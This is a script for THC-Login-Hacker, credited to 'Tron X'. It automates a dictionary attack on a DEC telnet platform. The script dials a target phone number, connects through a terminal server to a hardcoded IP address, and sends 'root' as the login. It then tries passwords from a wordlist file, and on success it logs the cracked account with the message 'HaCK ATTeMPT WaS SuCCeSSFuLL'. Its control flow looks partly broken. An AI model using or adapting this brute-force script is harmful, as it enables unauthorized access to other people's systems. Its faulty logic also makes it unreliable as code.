;
;
; ----------------------------------------------------------------------
;  Dec-Telnet-Platform  Script  for THC-Login-Hacker v0.9�  (by Tron X)
; ----------------------------------------------------------------------
;
;
;
#DEFINE
init_modem=z
init_data=8n1
LOGFILE=xxxxxx.log
PHONE_NR=xxxxxx
DIAL_TRIES=0
LOGIN_TRIES=0
DIC(1)=D:\hackusr\dictbig.txt
;dic(2)=d:\hackusr\bigdict2.txt
;dic(3)=d:\hackusr\bigdict3.txt

#NOCARRIER
LOG(NO CARRIER)
LOG(ON $DATE $TIME)
LOG(AT $DIC(1))
LOG(returning ...)
GOTO(#START)

#START
HANGUP
LOG_SESSION_ON
LOG()
log()
log( HaCK ATTeMPT STaRTeD ......)
log()
log(  TaRGeT: $PHONE_NR )
log(    DaTe: $DATE )
log(    TiMe: $TIME)
log()
log()
log( ......DiaLiNG)    
dial
log()
log( ......CoNNeCTeD!)
log()
log()
wait(5)
:1
wait4string(1,^M,5,goto(#start),sername>)
send(fh65)
:2
wait4string(1,^M,5,goto(#start),ocal>)
send(connect 189.25.56.7)
:3
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait4string(1,^C,5,goto(4),ogin:)
send(root)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
:4
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait4string(1,^D,5,goto(4),assword:)
send_next_dic(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
:5
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
:6
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
:7
beep
beep
beep
beep
beep
beep
beep
beep
beep
log()
log()
log()
Log(...... HaCK ATTeMPT WaS SuCCeSSFuLL!!!!!!!!!!!!!!)
log()
log(  TaRGeT: $PHONE_NR   DaTe: $DATE  TiMe: $TIME)
log()
log()
log()
log(        ACCouNT: root)
log(       PaSSWoRD: DIC(1))
log()
log()
log()
#END
